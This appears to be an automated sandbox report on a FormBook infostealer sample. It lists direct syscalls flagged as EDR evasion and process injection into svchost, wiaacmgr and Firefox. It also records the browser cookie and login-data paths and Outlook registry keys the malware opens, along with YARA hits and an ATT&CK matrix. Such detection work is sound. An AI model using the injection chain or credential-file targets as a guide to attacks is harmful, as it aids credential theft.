                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B89B3 mov eax, dword ptr fs:[00000030h]1_2_033B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B89B3 mov eax, dword ptr fs:[00000030h]1_2_033B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033429A0 mov eax, dword ptr fs:[00000030h]1_2_033429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033429A0 mov eax, dword ptr fs:[00000030h]1_2_033429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033429A0 mov eax, dword ptr fs:[00000030h]1_2_033429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033429A0 mov eax, dword ptr fs:[00000030h]1_2_033429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033429A0 mov eax, dword ptr fs:[00000030h]1_2_033429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033429A0 mov eax, dword ptr fs:[00000030h]1_2_033429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033429A0 mov eax, dword ptr fs:[00000030h]1_2_033429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033429A0 mov eax, dword ptr fs:[00000030h]1_2_033429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033429A0 mov eax, dword ptr fs:[00000030h]1_2_033429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033429A0 mov eax, dword ptr fs:[00000030h]1_2_033429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033429A0 mov eax, dword ptr fs:[00000030h]1_2_033429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033429A0 mov eax, dword ptr fs:[00000030h]1_2_033429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033429A0 mov eax, dword ptr fs:[00000030h]1_2_033429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033309AD mov eax, dword ptr fs:[00000030h]1_2_033309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033309AD mov eax, dword ptr fs:[00000030h]1_2_033309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033629F9 mov eax, dword ptr fs:[00000030h]1_2_033629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033629F9 mov eax, dword ptr fs:[00000030h]1_2_033629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033BE9E0 mov eax, dword ptr fs:[00000030h]1_2_033BE9E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0333A9D0 mov eax, dword ptr fs:[00000030h]1_2_0333A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0333A9D0 mov eax, dword ptr fs:[00000030h]1_2_0333A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0333A9D0 mov eax, dword ptr fs:[00000030h]1_2_0333A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0333A9D0 mov eax, dword ptr fs:[00000030h]1_2_0333A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0333A9D0 mov eax, dword ptr fs:[00000030h]1_2_0333A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0333A9D0 mov eax, dword ptr fs:[00000030h]1_2_0333A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033649D0 mov eax, dword ptr fs:[00000030h]1_2_033649D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033FA9D3 mov eax, dword ptr fs:[00000030h]1_2_033FA9D3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033C69C0 mov eax, dword ptr fs:[00000030h]1_2_033C69C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03352835 mov eax, dword ptr fs:[00000030h]1_2_03352835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03352835 mov eax, dword ptr fs:[00000030h]1_2_03352835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03352835 mov eax, dword ptr fs:[00000030h]1_2_03352835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03352835 mov ecx, dword ptr fs:[00000030h]1_2_03352835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03352835 mov eax, dword ptr fs:[00000030h]1_2_03352835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03352835 mov eax, dword ptr fs:[00000030h]1_2_03352835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336A830 mov eax, dword ptr fs:[00000030h]1_2_0336A830
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033D483A mov eax, dword ptr fs:[00000030h]1_2_033D483A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033D483A mov eax, dword ptr fs:[00000030h]1_2_033D483A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033BC810 mov eax, dword ptr fs:[00000030h]1_2_033BC810
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033BE872 mov eax, dword ptr fs:[00000030h]1_2_033BE872
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033BE872 mov eax, dword ptr fs:[00000030h]1_2_033BE872
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exeCode function: 0_2_00940B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_00940B62
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exeCode function: 0_2_00912622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00912622
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exeCode function: 0_2_0090083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0090083F
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exeCode function: 0_2_009009D5 SetUnhandledExceptionFilter,0_2_009009D5
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exeCode function: 0_2_00900C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00900C21

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Found direct / indirect Syscall (likely to bypass EDR)
                Source: C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exeNtWriteVirtualMemory: Direct from: 0x76F0490CJump to behavior
                Source: C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exeNtAllocateVirtualMemory: Direct from: 0x76F03C9CJump to behavior
                Source: C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exeNtClose: Direct from: 0x76F02B6C
                Source: C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exeNtReadVirtualMemory: Direct from: 0x76F02E8CJump to behavior
                Source: C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exeNtCreateKey: Direct from: 0x76F02C6CJump to behavior
                Source: C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exeNtSetInformationThread: Direct from: 0x76F02B4CJump to behavior
                Source: C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exeNtQueryAttributesFile: Direct from: 0x76F02E6CJump to behavior
                Source: C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exeNtAllocateVirtualMemory: Direct from: 0x76F048ECJump to behavior
                Source: C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exeNtQuerySystemInformation: Direct from: 0x76F048CCJump to behavior
                Source: C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exeNtQueryVolumeInformationFile: Direct from: 0x76F02F2CJump to behavior
                Source: C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exeNtOpenSection: Direct from: 0x76F02E0CJump to behavior
                Source: C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exeNtSetInformationThread: Direct from: 0x76EF63F9Jump to behavior
                Source: C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exeNtDeviceIoControlFile: Direct from: 0x76F02AECJump to behavior
                Source: C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exeNtAllocateVirtualMemory: Direct from: 0x76F02BECJump to behavior
                Source: C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exeNtCreateFile: Direct from: 0x76F02FECJump to behavior
                Source: C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exeNtOpenFile: Direct from: 0x76F02DCCJump to behavior
                Source: C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exeNtQueryInformationToken: Direct from: 0x76F02CACJump to behavior
                Source: C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exeNtTerminateThread: Direct from: 0x76F02FCCJump to behavior
                Source: C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exeNtClose: Direct from: 0x76EF7B2E
                Source: C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exeNtOpenKeyEx: Direct from: 0x76F02B9CJump to behavior
                Source: C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exeNtProtectVirtualMemory: Direct from: 0x76F02F9CJump to behavior
                Source: C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exeNtSetInformationProcess: Direct from: 0x76F02C5CJump to behavior
                Source: C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exeNtNotifyChangeKey: Direct from: 0x76F03C2CJump to behavior
                Source: C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exeNtUnmapViewOfSection: Direct from: 0x76F02D3CJump to behavior
                Source: C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exeNtCreateMutant: Direct from: 0x76F035CCJump to behavior
                Source: C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exeNtWriteVirtualMemory: Direct from: 0x76F02E3CJump to behavior
                Source: C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exeNtMapViewOfSection: Direct from: 0x76F02D1CJump to behavior
                Source: C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exeNtResumeThread: Direct from: 0x76F036ACJump to behavior
                Source: C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exeNtAllocateVirtualMemory: Direct from: 0x76F02BFCJump to behavior
                Source: C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exeNtReadFile: Direct from: 0x76F02ADCJump to behavior
                Source: C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exeNtQuerySystemInformation: Direct from: 0x76F02DFCJump to behavior
                Source: C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exeNtDelayExecution: Direct from: 0x76F02DDCJump to behavior
                Source: C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exeNtQueryInformationProcess: Direct from: 0x76F02C26Jump to behavior
                Source: C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exeNtResumeThread: Direct from: 0x76F02FBCJump to behavior
                Source: C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exeNtCreateUserProcess: Direct from: 0x76F0371CJump to behavior
                Maps a DLL or memory area into another process
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\wiaacmgr.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\wiaacmgr.exeSection loaded: NULL target: C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\wiaacmgr.exeSection loaded: NULL target: C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\wiaacmgr.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\wiaacmgr.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Modifies the context of a thread in another process (thread injection)
                Source: C:\Windows\SysWOW64\wiaacmgr.exeThread register set: target process: 4488Jump to behavior
                Queues an APC in another process (thread injection)
                Source: C:\Windows\SysWOW64\wiaacmgr.exeThread APC queued: target process: C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exeJump to behavior
                Writes to foreign memory regions
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 93A008Jump to behavior
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exeCode function: 0_2_00941201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00941201
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exeCode function: 0_2_00922BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00922BA5
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exeCode function: 0_2_0094B226 SendInput,keybd_event,0_2_0094B226
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exeCode function: 0_2_009622DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event,0_2_009622DA
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\3HnH4uJtE7.exe"Jump to behavior
                Source: C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exeProcess created: C:\Windows\SysWOW64\wiaacmgr.exe "C:\Windows\SysWOW64\wiaacmgr.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\wiaacmgr.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exeCode function: 0_2_00940B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_00940B62
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exeCode function: 0_2_00941663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_00941663
                Source: 3HnH4uJtE7.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                Source: 3HnH4uJtE7.exe, wdFhguqpcrad.exe, 00000003.00000000.1885834874.0000000001A21000.00000002.00000001.00040000.00000000.sdmp, wdFhguqpcrad.exe, 00000003.00000002.3560720383.0000000001A20000.00000002.00000001.00040000.00000000.sdmp, wdFhguqpcrad.exe, 00000007.00000000.2027924118.0000000001880000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: wdFhguqpcrad.exe, 00000003.00000000.1885834874.0000000001A21000.00000002.00000001.00040000.00000000.sdmp, wdFhguqpcrad.exe, 00000003.00000002.3560720383.0000000001A20000.00000002.00000001.00040000.00000000.sdmp, wdFhguqpcrad.exe, 00000007.00000000.2027924118.0000000001880000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: wdFhguqpcrad.exe, 00000003.00000000.1885834874.0000000001A21000.00000002.00000001.00040000.00000000.sdmp, wdFhguqpcrad.exe, 00000003.00000002.3560720383.0000000001A20000.00000002.00000001.00040000.00000000.sdmp, wdFhguqpcrad.exe, 00000007.00000000.2027924118.0000000001880000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: wdFhguqpcrad.exe, 00000003.00000000.1885834874.0000000001A21000.00000002.00000001.00040000.00000000.sdmp, wdFhguqpcrad.exe, 00000003.00000002.3560720383.0000000001A20000.00000002.00000001.00040000.00000000.sdmp, wdFhguqpcrad.exe, 00000007.00000000.2027924118.0000000001880000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exeCode function: 0_2_00900698 cpuid 0_2_00900698
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exeCode function: 0_2_00958195 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,0_2_00958195
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exeCode function: 0_2_0093D27A GetUserNameW,0_2_0093D27A
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exeCode function: 0_2_0091BB6F _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_0091BB6F
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exeCode function: 0_2_008E42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_008E42DE

                Stealing of Sensitive Information

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000006.00000002.3561027868.0000000004410000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3561060314.0000000004460000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3560023676.0000000000680000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1962969685.00000000031C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1962529025.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.3560926994.00000000030D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1963457204.0000000003A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\SysWOW64\wiaacmgr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\wiaacmgr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\wiaacmgr.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\wiaacmgr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\wiaacmgr.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\wiaacmgr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\wiaacmgr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\wiaacmgr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Windows\SysWOW64\wiaacmgr.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
                Source: 3HnH4uJtE7.exeBinary or memory string: WIN_81
                Source: 3HnH4uJtE7.exeBinary or memory string: WIN_XP
                Source: 3HnH4uJtE7.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
                Source: 3HnH4uJtE7.exeBinary or memory string: WIN_XPe
                Source: 3HnH4uJtE7.exeBinary or memory string: WIN_VISTA
                Source: 3HnH4uJtE7.exeBinary or memory string: WIN_7
                Source: 3HnH4uJtE7.exeBinary or memory string: WIN_8

                Remote Access Functionality

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000006.00000002.3561027868.0000000004410000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3561060314.0000000004460000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3560023676.0000000000680000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1962969685.00000000031C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1962529025.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.3560926994.00000000030D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1963457204.0000000003A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exeCode function: 0_2_00961204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,0_2_00961204
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exeCode function: 0_2_00961806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00961806

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire Infrastructure2
                Valid Accounts                		1
                Native API                		1
                DLL Side-Loading                		1
                Exploitation for Privilege Escalation                		1
                Disable or Modify Tools                		1
                OS Credential Dumping                		2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		4
                Ingress Tool Transfer                		Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault AccountsScheduled Task/Job2
                Valid Accounts                		1
                Abuse Elevation Control Mechanism                		1
                Deobfuscate/Decode Files or Information                		21
                Input Capture                		1
                Account Discovery                		Remote Desktop Protocol1
                Data from Local System                		1
                Encrypted Channel                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading                		1
                Abuse Elevation Control Mechanism                		Security Account Manager2
                File and Directory Discovery                		SMB/Windows Admin Shares1
                Email Collection                		4
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
                Valid Accounts                		3
                Obfuscated Files or Information                		NTDS116
                System Information Discovery                		Distributed Component Object Model21
                Input Capture                		4
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
                Access Token Manipulation                		1
                DLL Side-Loading                		LSA Secrets241
                Security Software Discovery                		SSH3
                Clipboard Data                		Fallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
                Process Injection                		2
                Valid Accounts                		Cached Domain Credentials12
                Virtualization/Sandbox Evasion                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                Virtualization/Sandbox Evasion                		DCSync3
                Process Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
